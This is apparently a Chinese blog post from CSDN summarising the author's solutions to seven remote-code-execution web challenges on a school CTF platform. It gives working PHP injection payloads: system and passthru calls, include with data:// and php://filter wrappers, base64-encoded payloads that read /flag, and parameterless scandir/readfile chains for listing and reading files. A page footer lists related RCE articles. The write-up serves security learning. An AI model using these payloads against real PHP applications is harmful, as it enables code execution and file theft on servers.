校内ctf平台web小结(rce)

最新推荐文章于 2024-03-08 16:59:57 发布
最新推荐文章于 2024-03-08 16:59:57 发布
阅读量364 收藏 2
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/New_Ss_/article/details/113610113
版权

目前都是rce

web1

经过代码审计可以看出,如果不存在区分大小写的flag,就会执行”c“。没有经过任何闭合,很简单的构造c=system('ls');

经过寻找得到flag,可以在flag中添加\来绕过

web2

代码审计,绕过了system函数,我们可以换用passthru,不再赘述。

web3

代码审计可以看到绕过了较多的函数,这里再用别的函数一一绕过太麻烦,我们可以构造?c=include($_GET[a]);来例用php伪协议

?c=include($_GET[a]);&a=data:text/plain,<?php include('/flag');

?c=include($_GET[a]);&a=data:text/plain;base64,PD9waHAgaW5jbHVkZSgnL2ZsYWcnKTs=

?c=include($_GET[a]);&a=php://filter/read=convert.base64-encode/resource=/flag

web4

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=/flag

web5

代码审计,这里直接用了include,所以不需要自己构造了

?c=data:text/plain,<?php%20system(%27cat%20../../../fla\g%27);

?c=data:text/plain;base64,PD9waHAgaW5jbHVkZSgnL2ZsYWcnKTs=

web6

?c=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgLi4vLi4vLi4vZmxhXGcnKTs=

web7

闭合了一万个字符串

这里需要用到新的知识点

无参数阅读文件

可以是a()、a(b())或a(b(c())),但不能是a('b')或a('b','c')

这里用到的大多是数组的函数

 

current()返回数组中的单元,默认取第一个值:

localeconv()返回一包含本地数字及货币格式信息的数组。

所以:

print_r(scandir(current(localeconv())));打印当前目录下的文件名

print_r(scandir(next(scandir(getcwd())))) 获取上一层文件夹名称

print_r(scandir(chr(ord(strrev(crypt(serialize(array()))))))); 查看和读取根目录文件

print_r(scandir(getcwd()));   输出当前文件夹所有文件名.

print_r(scandir(dirname(getcwd())));  查看上一层文件名

print_r(scandir(dirname(chdir(dirname(getcwd())))));调整工作台到该处

readfile(array_rand(array_flip(sandir(chdir(dirname(dirname(getcwd())))));随机显示数组,需要多刷新。

 

 

 

Hbhoo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTFHUB-web-RCE
ookami6497的博客
12-03 1411
CTF】命令执行RCE
qq_53099119的博客
04-02 2629
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
CTFWEB题——RCE
tomyyyyy
10-31 6038
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
CTF学习)CTFHUB-WEB-RCE
weixin_43486981的博客
08-14 4947
CTFHUB-WEB-RCERCEeval执行文件包含strpos()的漏洞php://input知识点 php://input远程包含读取源代码php://filter命令注入linux中命令的链接符号过滤catlinux查看文本的命令过滤空格过滤目录分隔符过滤运算符综合过滤练习 RCE RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵
CTFHUB WEB RCE
wwwwyyyrre的博客
05-13 272
先来了解一下rce命令RCE英文全称:remote command/code execute分为远程命令执行ping和远程代码执行evel。漏洞出现的原因:没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
ctf加解密小结
08-15
ctf中关于加解密特征的一些小结,以作做题时的参考。摘要好烦
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF 在这篇文章中,我们将探讨国科大web安全中期CTF的相关知识点。 一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的...
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2062
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.csdn.net/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 2931
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTFweb无参数RCE
遇事不决冲冲冲
07-25 2909
1 打开题目便是源代码,通过a的参数来实现RCE <?php #-*-coding: utf-8 -*- //flag in show_flag.php if(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); } }else{ hig
CTFHub-技能树-web-RCE
yuqie的博客
06-14 183
RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞。攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
萌新小白对于ctf学习的笔记--CTF中的RCE
最新发布
黑战士的博客
03-08 1223
以上就是我对于RCE学习的一个总结,其中也借鉴了很多网上大佬们的文章,也有视频学习的笔记。如果有不足,会很快改的。
CTF RCE漏洞
nobugnomoney的博客
09-17 4324
RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 PHP 执行系统外部命令 system() exec() passthru() PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时
ctf web方向与php学习记录20之RCE初见
这周末在做梦的博客
10-16 458
一,RCE是什么? 1定义:RCE(remote command/code execute)远程代码执行,是互联网的一种安全漏洞。 2分类 (1)远程命令执行ping (2)远程代码执行evel。 3漏洞出现的原因 没有在输入口做输入处理。 注意:由于传入的必须是有效的 PHP 代码,所有的语句必须以分号结尾。 二,ctfhub——eval执行 先执行 url+/?cmd=passthru(“ls”);或 url+/?cmd=system(“ls”);后无有效信息。 然后输入 url+/?cmd=passt
ctfhub--ctf--web--RCE(1.eval执行2.文件包含3.常见伪协议用法4.php://input5.远程包含6.读取源代)
feiniaotjx的博客
10-05 589
RCE1.eval执行2.文件包含3.php://input 1.eval执行 request接受post和get请求,接受cmd参数 使用远程系统命令遍历目录 查看文件 2.文件包含 需要传一个file参数,不能为flag,存在shell.txt,可连接shell,故可以访问?file=shell.txt 之后post提交ctfhub=system('cat /flag');查看flag 3.php://input ...
校内CTF比赛WriteUp
PCK
07-03 1195
文章目录 asdasd asdas
ctf web rce
10-17
我理解您的问题是关于 CTF 竞赛中 Web 漏洞中的 RCE(Remote Code Execution)的问题。RCE 是指攻击者可以通过漏洞执行任意代码,从而控制受害者的计算机系统。在 Web 漏洞中,常见的 RCE 漏洞包括但不限于命令注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值